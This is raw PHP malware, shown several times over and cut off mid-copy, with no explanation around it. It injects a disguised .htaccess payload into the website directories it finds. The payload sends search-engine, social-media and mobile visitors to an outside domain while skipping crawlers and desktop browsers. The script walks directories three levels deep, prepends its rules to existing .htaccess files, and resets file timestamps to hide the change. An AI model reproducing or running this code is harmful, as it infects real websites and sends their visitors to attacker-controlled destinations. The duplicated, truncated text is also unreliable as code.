$content=<< #RewriteEngine On #RewriteBase / #RewriteCond %{REQUEST_FILENAME} !-f #RewriteCond %{REQUEST_FILENAME} !-d #RewriteRule . /index.php [L] # # END WordPress RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*youtube.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*qq.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*blog.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ya.*$ [NC] RewriteRule .* http://portal-d.pw/XcTyTp [R,L] RewriteEngine on RewriteCond %{HTTP_USER_AGENT} acs [NC,OR] RewriteCond %{HTTP_USER_AGENT} alav [NC,OR] RewriteCond %{HTTP_USER_AGENT} alca [NC,OR] RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR] RewriteCond %{HTTP_USER_AGENT} audi [NC,OR] RewriteCond %{HTTP_USER_AGENT} aste [NC,OR] RewriteCond %{HTTP_USER_AGENT} avan [NC,OR] RewriteCond %{HTTP_USER_AGENT} benq [NC,OR] RewriteCond %{HTTP_USER_AGENT} bird [NC,OR] RewriteCond %{HTTP_USER_AGENT} blac [NC,OR] RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR] RewriteCond %{HTTP_USER_AGENT} brew [NC,OR] RewriteCond %{HTTP_USER_AGENT} cell [NC,OR] RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR] RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR] RewriteCond %{HTTP_USER_AGENT} dang [NC,OR] RewriteCond %{HTTP_USER_AGENT} doco [NC,OR] RewriteCond %{HTTP_USER_AGENT} eric [NC,OR] RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR] RewriteCond %{HTTP_USER_AGENT} inno [NC,OR] RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR] RewriteCond %{HTTP_USER_AGENT} java [NC,OR] RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR] RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR] RewriteCond %{HTTP_USER_AGENT} keji [NC,OR] RewriteCond %{HTTP_USER_AGENT} leno [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR] RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR] RewriteCond %{HTTP_USER_AGENT} maui [NC,OR] RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR] RewriteCond %{HTTP_USER_AGENT} midp [NC,OR] RewriteCond %{HTTP_USER_AGENT} mits [NC,OR] RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR] RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR] RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR] RewriteCond %{HTTP_USER_AGENT} moto [NC,OR] RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR] RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR] RewriteCond %{HTTP_USER_AGENT} newt [NC,OR] RewriteCond %{HTTP_USER_AGENT} noki [NC,OR] RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR] RewriteCond %{HTTP_USER_AGENT} palm [NC,OR] RewriteCond %{HTTP_USER_AGENT} pana [NC,OR] RewriteCond %{HTTP_USER_AGENT} pant [NC,OR] RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR] RewriteCond %{HTTP_USER_AGENT} phil [NC,OR] RewriteCond %{HTTP_USER_AGENT} play [NC,OR] RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR] RewriteCond %{HTTP_USER_AGENT} port [NC,OR] RewriteCond %{HTTP_USER_AGENT} prox [NC,OR] RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR] RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR] RewriteCond %{HTTP_USER_AGENT} sage [NC,OR] RewriteCond %{HTTP_USER_AGENT} sams [NC,OR] RewriteCond %{HTTP_USER_AGENT} sany [NC,OR] RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR] RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR] RewriteCond %{HTTP_USER_AGENT} send [NC,OR] RewriteCond %{HTTP_USER_AGENT} seri [NC,OR] RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR] RewriteCond %{HTTP_USER_AGENT} shar [NC,OR] RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR] RewriteCond %{HTTP_USER_AGENT} siem [NC,OR] RewriteCond %{HTTP_USER_AGENT} smal [NC,OR] RewriteCond %{HTTP_USER_AGENT} smar [NC,OR] RewriteCond %{HTTP_USER_AGENT} sony [NC,OR] RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR] RewriteCond %{HTTP_USER_AGENT} symb [NC,OR] RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR] RewriteCond %{HTTP_USER_AGENT} teli [NC,OR] RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR] RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR] RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR] RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR] RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR] RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR] RewriteCond %{HTTP_USER_AGENT} voda [NC,OR] RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR] RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR] RewriteCond %{HTTP_USER_AGENT} webc [NC,OR] RewriteCond %{HTTP_USER_AGENT} winw [NC,OR] RewriteCond %{HTTP_USER_AGENT} winw [NC,OR] RewriteCond %{HTTP_USER_AGENT} xda [NC,OR] RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR] RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR] RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR] RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR] RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR] RewriteCond %{HTTP_USER_AGENT} mini [NC,OR] RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR] RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR] RewriteCond %{HTTP_USER_AGENT} midp [NC,OR] RewriteCond %{HTTP_USER_AGENT} wap [NC,OR] RewriteCond %{HTTP_USER_AGENT} phone [NC,OR] RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR] RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR] RewriteCond %{HTTP_USER_AGENT} android [NC,OR] RewriteCond %{HTTP_USER_AGENT} Android [NC,OR] RewriteCond %{HTTP_USER_AGENT} pda [NC,OR] RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR] RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR] RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR] RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR] RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR] RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR] RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR] RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR] RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC] RewriteCond %{HTTP_USER_AGENT} !bsd [NC] RewriteCond %{HTTP_USER_AGENT} !x11 [NC] RewriteCond %{HTTP_USER_AGENT} !unix [NC] RewriteCond %{HTTP_USER_AGENT} !macos [NC] RewriteCond %{HTTP_USER_AGENT} !macintosh [NC] RewriteCond %{HTTP_USER_AGENT} !playstation [NC] RewriteCond %{HTTP_USER_AGENT} !google [NC] RewriteCond %{HTTP_USER_AGENT} !yandex [NC] RewriteCond %{HTTP_USER_AGENT} !bot [NC] RewriteCond %{HTTP_USER_AGENT} !libwww [NC] RewriteCond %{HTTP_USER_AGENT} !msn [NC] RewriteCond %{HTTP_USER_AGENT} !america [NC] RewriteCond %{HTTP_USER_AGENT} !avant [NC] RewriteCond %{HTTP_USER_AGENT} !download [NC] RewriteCond %{HTTP_USER_AGENT} !fdm [NC] RewriteCond %{HTTP_USER_AGENT} !maui [NC] RewriteCond %{HTTP_USER_AGENT} !webmoney [NC] RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC] RewriteRule ^(.*)$ http://portal-d.pw/XcTyTp [L,R=302] CODE; $str=array(0,'WORDPRESS'); //API $wp = array('wp-admin','wp-content','wp-includes'); $jm = array('administrator','cache','components','images','includes','language','libraries','logs','modules','plugins','templates','tmp','xmlrpc'); $exc = array_merge($wp,$jm); //Vars $dir = path_finder(); $what = array('.htaccess'); $signature = array('index.php','index.html','index.htm'.'index.phtml','index.shtml'); #Function Path_Finder function path_finder(){ $p=$_SERVER['SCRIPT_FILENAME']; if(empty($p)){ exit(''); } else{ $p=str_replace('\/', '/', $p); $p=trim($p, '/'); $p=substr_count($p, '/')-1; } for($k=1; $k<=$p; $k++){ if(!is_readable(str_repeat('../', $k))){ $pth=trim(str_repeat('../', $k-1)); break; } } if($pth){ return $pth; } else{ return trim(str_repeat('../', $p-1)); } } #Function Edit function edit($path,$content,$str){ $lastmod=filemtime($path); $strnum=file($path); if(!stristr($strnum[$str[0]],$str[1])){ if(file_put_contents($path,$content."\n".file_get_contents($path))){ echo ''; } else{ echo ''; } //Touch touch($path,$lastmod); } else{ echo ''; } } #Function Smartscan function smartscan($dir){ if(function_exists("scandir")){ return scandir($dir); } else{ $dh = opendir($dir); while(false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function search($dir,$content,$str,$what,$signature,$exc){ $d=array(); $d1=array(); $d2=array(); $res=smartscan($dir); if(count(array_intersect($res,$signature)) > 0 && !in_array($what[0],$res)){ if(file_put_contents($dir.'/'.$what[0],$content)){ chmod($dir.'/'.$what[0], 0644); echo ''; } else{ echo ''; } } //add dirs to massive 1 foreach($res as $v){ if(is_dir($dir.'/'.$v) && $v!=="." && $v!==".."){ $d[]=$dir.'/'.$v; } } //scan 1-deep files foreach($d as $n){ $res2=smartscan($n); $compare = explode('/',$n); $compare = $compare[count($compare)-1]; if(count(array_intersect($res2,$signature)) > 0 && !in_array($what[0],$res2) && !in_array($compare,$exc)){ if(file_put_contents($n.'/'.$what,$content)){ chmod($n.'/'.$what[0], 0644); echo ''; } else{ echo ''; } } foreach($res2 as $l){ if(is_dir($n.'/'.$l) && $l!=='.' && $l!=='..'){ //add dirs to massive 2 $d1[]=$n.'/'.$l; } if(preg_match('#'.implode('|',$what).'#i',$l)){ chmod($n.'/'.$l, 0666); if(is_writable($n.'/'.$l)){ edit($n.'/'.$l,$content,$str); chmod($n.'/'.$l, 0644); }else{ echo ''; } } } } //scan 2-deep files foreach($d1 as $n1){ $res2=smartscan($n1); $compare = explode('/',$n1); $compare = $compare[count($compare)-1]; if(count(array_intersect($res2,$signature)) > 0 && !in_array($what[0],$res2) && !in_array($compare,$exc)){ if(file_put_contents($n1.'/'.$what[0],$content) ){ chmod($n1.'/'.$what[0], 0644); echo ''; } else{ echo ''; } } foreach($res2 as $l1){ if(is_dir($n1.'/'.$l1) && $l1!=='.' && $l1!=='..'){ //add dirs to massive 3 $d2[]=$n1.'/'.$l1; } if(preg_match('#'.implode('|',$what).'#i',$l1)){ chmod($n1.'/'.$l1, 0666); if(is_writable($n1.'/'.$l1)){ edit($n1.'/'.$l1,$content,$str); chmod($n1.'/'.$l1, 0644); }else{ echo ''; } } } } //scan 3-deep files foreach($d2 as $n2){ $res3=smartscan($n2); $compare = explode('/',$n2); $compare = $compare[count($compare)-1]; if(count(array_intersect($res3,$signature)) > 0 && !in_array($what[0],$res3) && !in_array($compare,$exc)){ if(file_put_contents($n2.'/'.$what[0],$content) ){ chmod($n2.'/'.$what[0], 0644); echo ''; } else{ echo ''; } } foreach($res3 as $l2){ if(preg_match('#'.implode('|',$what).'#i',$l2)){ chmod($n2.'/'.$l2, 0666); if(is_writable($n2.'/'.$l2)){ edit($n2.'/'.$l2,$content,$str); chmod($n2.'/'.$l2, 0644); }else{ echo ''; } } } } } #Exec Script search($dir,$content,$str,$what,$signature,$exc); $content=<< #RewriteEngine On #RewriteBase / #RewriteCond %{REQUEST_FILENAME} !-f #RewriteCond %{REQUEST_FILENAME} !-d #RewriteRule . /index.php [L] # # END WordPress RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*youtube.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*qq.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*blog.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ya.*$ [NC] RewriteRule .* http://portal-d.pw/XcTyTp [R,L] RewriteEngine on RewriteCond %{HTTP_USER_AGENT} acs [NC,OR] RewriteCond %{HTTP_USER_AGENT} alav [NC,OR] RewriteCond %{HTTP_USER_AGENT} alca [NC,OR] RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR] RewriteCond %{HTTP_USER_AGENT} audi [NC,OR] RewriteCond %{HTTP_USER_AGENT} aste [NC,OR] RewriteCond %{HTTP_USER_AGENT} avan [NC,OR] RewriteCond %{HTTP_USER_AGENT} benq [NC,OR] RewriteCond %{HTTP_USER_AGENT} bird [NC,OR] RewriteCond %{HTTP_USER_AGENT} blac [NC,OR] RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR] RewriteCond %{HTTP_USER_AGENT} brew [NC,OR] RewriteCond %{HTTP_USER_AGENT} cell [NC,OR] RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR] RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR] RewriteCond %{HTTP_USER_AGENT} dang [NC,OR] RewriteCond %{HTTP_USER_AGENT} doco [NC,OR] RewriteCond %{HTTP_USER_AGENT} eric [NC,OR] RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR] RewriteCond %{HTTP_USER_AGENT} inno [NC,OR] RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR] RewriteCond %{HTTP_USER_AGENT} java [NC,OR] RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR] RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR] RewriteCond %{HTTP_USER_AGENT} keji [NC,OR] RewriteCond %{HTTP_USER_AGENT} leno [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR] RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR] RewriteCond %{HTTP_USER_AGENT} maui [NC,OR] RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR] RewriteCond %{HTTP_USER_AGENT} midp [NC,OR] RewriteCond %{HTTP_USER_AGENT} mits [NC,OR] RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR] RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR] RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR] RewriteCond %{HTTP_USER_AGENT} moto [NC,OR] RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR] RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR] RewriteCond %{HTTP_USER_AGENT} newt [NC,OR] RewriteCond %{HTTP_USER_AGENT} noki [NC,OR] RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR] RewriteCond %{HTTP_USER_AGENT} palm [NC,OR] RewriteCond %{HTTP_USER_AGENT} pana [NC,OR] RewriteCond %{HTTP_USER_AGENT} pant [NC,OR] RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR] RewriteCond %{HTTP_USER_AGENT} phil [NC,OR] RewriteCond %{HTTP_USER_AGENT} play [NC,OR] RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR] RewriteCond %{HTTP_USER_AGENT} port [NC,OR] RewriteCond %{HTTP_USER_AGENT} prox [NC,OR] RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR] RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR] RewriteCond %{HTTP_USER_AGENT} sage [NC,OR] RewriteCond %{HTTP_USER_AGENT} sams [NC,OR] RewriteCond %{HTTP_USER_AGENT} sany [NC,OR] RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR] RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR] RewriteCond %{HTTP_USER_AGENT} send [NC,OR] RewriteCond %{HTTP_USER_AGENT} seri [NC,OR] RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR] RewriteCond %{HTTP_USER_AGENT} shar [NC,OR] RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR] RewriteCond %{HTTP_USER_AGENT} siem [NC,OR] RewriteCond %{HTTP_USER_AGENT} smal [NC,OR] RewriteCond %{HTTP_USER_AGENT} smar [NC,OR] RewriteCond %{HTTP_USER_AGENT} sony [NC,OR] RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR] RewriteCond %{HTTP_USER_AGENT} symb [NC,OR] RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR] RewriteCond %{HTTP_USER_AGENT} teli [NC,OR] RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR] RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR] RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR] RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR] RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR] RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR] RewriteCond %{HTTP_USER_AGENT} voda [NC,OR] RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR] RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR] RewriteCond %{HTTP_USER_AGENT} webc [NC,OR] RewriteCond %{HTTP_USER_AGENT} winw [NC,OR] RewriteCond %{HTTP_USER_AGENT} winw [NC,OR] RewriteCond %{HTTP_USER_AGENT} xda [NC,OR] RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR] RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR] RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR] RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR] RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR] RewriteCond %{HTTP_USER_AGENT} mini [NC,OR] RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR] RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR] RewriteCond %{HTTP_USER_AGENT} midp [NC,OR] RewriteCond %{HTTP_USER_AGENT} wap [NC,OR] RewriteCond %{HTTP_USER_AGENT} phone [NC,OR] RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR] RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR] RewriteCond %{HTTP_USER_AGENT} android [NC,OR] RewriteCond %{HTTP_USER_AGENT} Android [NC,OR] RewriteCond %{HTTP_USER_AGENT} pda [NC,OR] RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR] RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR] RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR] RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR] RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR] RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR] RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR] RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR] RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC] RewriteCond %{HTTP_USER_AGENT} !bsd [NC] RewriteCond %{HTTP_USER_AGENT} !x11 [NC] RewriteCond %{HTTP_USER_AGENT} !unix [NC] RewriteCond %{HTTP_USER_AGENT} !macos [NC] RewriteCond %{HTTP_USER_AGENT} !macintosh [NC] RewriteCond %{HTTP_USER_AGENT} !playstation [NC] RewriteCond %{HTTP_USER_AGENT} !google [NC] RewriteCond %{HTTP_USER_AGENT} !yandex [NC] RewriteCond %{HTTP_USER_AGENT} !bot [NC] RewriteCond %{HTTP_USER_AGENT} !libwww [NC] RewriteCond %{HTTP_USER_AGENT} !msn [NC] RewriteCond %{HTTP_USER_AGENT} !america [NC] RewriteCond %{HTTP_USER_AGENT} !avant [NC] RewriteCond %{HTTP_USER_AGENT} !download [NC] RewriteCond %{HTTP_USER_AGENT} !fdm [NC] RewriteCond %{HTTP_USER_AGENT} !maui [NC] RewriteCond %{HTTP_USER_AGENT} !webmoney [NC] RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC] RewriteRule ^(.*)$ http://portal-d.pw/XcTyTp [L,R=302] CODE; $str=array(0,'WORDPRESS'); //API $wp = array('wp-admin','wp-content','wp-includes'); $jm = array('administrator','cache','components','images','includes','language','libraries','logs','modules','plugins','templates','tmp','xmlrpc'); $exc = array_merge($wp,$jm); //Vars $dir = path_finder(); $what = array('.htaccess'); $signature = array('index.php','index.html','index.htm'.'index.phtml','index.shtml'); #Function Path_Finder function path_finder(){ $p=$_SERVER['SCRIPT_FILENAME']; if(empty($p)){ exit(''); } else{ $p=str_replace('\/', '/', $p); $p=trim($p, '/'); $p=substr_count($p, '/')-1; } for($k=1; $k<=$p; $k++){ if(!is_readable(str_repeat('../', $k))){ $pth=trim(str_repeat('../', $k-1)); break; } } if($pth){ return $pth; } else{ return trim(str_repeat('../', $p-1)); } } #Function Edit function edit($path,$content,$str){ $lastmod=filemtime($path); $strnum=file($path); if(!stristr($strnum[$str[0]],$str[1])){ if(file_put_contents($path,$content."\n".file_get_contents($path))){ echo ''; } else{ echo ''; } //Touch touch($path,$lastmod); } else{ echo ''; } } #Function Smartscan function smartscan($dir){ if(function_exists("scandir")){ return scandir($dir); } else{ $dh = opendir($dir); while(false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function search($dir,$content,$str,$what,$signature,$exc){ $d=array(); $d1=array(); $d2=array(); $res=smartscan($dir); if(count(array_intersect($res,$signature)) > 0 && !in_array($what[0],$res)){ if(file_put_contents($dir.'/'.$what[0],$content)){ chmod($dir.'/'.$what[0], 0644); echo ''; } else{ echo ''; } } //add dirs to massive 1 foreach($res as $v){ if(is_dir($dir.'/'.$v) && $v!=="." && $v!==".."){ $d[]=$dir.'/'.$v; } } //scan 1-deep files foreach($d as $n){ $res2=smartscan($n); $compare = explode('/',$n); $compare = $compare[count($compare)-1]; if(count(array_intersect($res2,$signature)) > 0 && !in_array($what[0],$res2) && !in_array($compare,$exc)){ if(file_put_contents($n.'/'.$what,$content)){ chmod($n.'/'.$what[0], 0644); echo ''; } else{ echo ''; } } foreach($res2 as $l){ if(is_dir($n.'/'.$l) && $l!=='.' && $l!=='..'){ //add dirs to massive 2 $d1[]=$n.'/'.$l; } if(preg_match('#'.implode('|',$what).'#i',$l)){ chmod($n.'/'.$l, 0666); if(is_writable($n.'/'.$l)){ edit($n.'/'.$l,$content,$str); chmod($n.'/'.$l, 0644); }else{ echo ''; } } } } //scan 2-deep files foreach($d1 as $n1){ $res2=smartscan($n1); $compare = explode('/',$n1); $compare = $compare[count($compare)-1]; if(count(array_intersect($res2,$signature)) > 0 && !in_array($what[0],$res2) && !in_array($compare,$exc)){ if(file_put_contents($n1.'/'.$what[0],$content) ){ chmod($n1.'/'.$what[0], 0644); echo ''; } else{ echo ''; } } foreach($res2 as $l1){ if(is_dir($n1.'/'.$l1) && $l1!=='.' && $l1!=='..'){ //add dirs to massive 3 $d2[]=$n1.'/'.$l1; } if(preg_match('#'.implode('|',$what).'#i',$l1)){ chmod($n1.'/'.$l1, 0666); if(is_writable($n1.'/'.$l1)){ edit($n1.'/'.$l1,$content,$str); chmod($n1.'/'.$l1, 0644); }else{ echo ''; } } } } //scan 3-deep files foreach($d2 as $n2){ $res3=smartscan($n2); $compare = explode('/',$n2); $compare = $compare[count($compare)-1]; if(count(array_intersect($res3,$signature)) > 0 && !in_array($what[0],$res3) && !in_array($compare,$exc)){ if(file_put_contents($n2.'/'.$what[0],$content) ){ chmod($n2.'/'.$what[0], 0644); echo ''; } else{ echo ''; } } foreach($res3 as $l2){ if(preg_match('#'.implode('|',$what).'#i',$l2)){ chmod($n2.'/'.$l2, 0666); if(is_writable($n2.'/'.$l2)){ edit($n2.'/'.$l2,$content,$str); chmod($n2.'/'.$l2, 0644); }else{ echo ''; } } } } } #Exec Script search($dir,$content,$str,$what,$signature,$exc); $content=<< #RewriteEngine On #RewriteBase / #RewriteCond %{REQUEST_FILENAME} !-f #RewriteCond %{REQUEST_FILENAME} !-d #RewriteRule . /index.php [L] # # END WordPress RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*youtube.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*qq.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR] RewriteCond %{HTTP_REFERER} 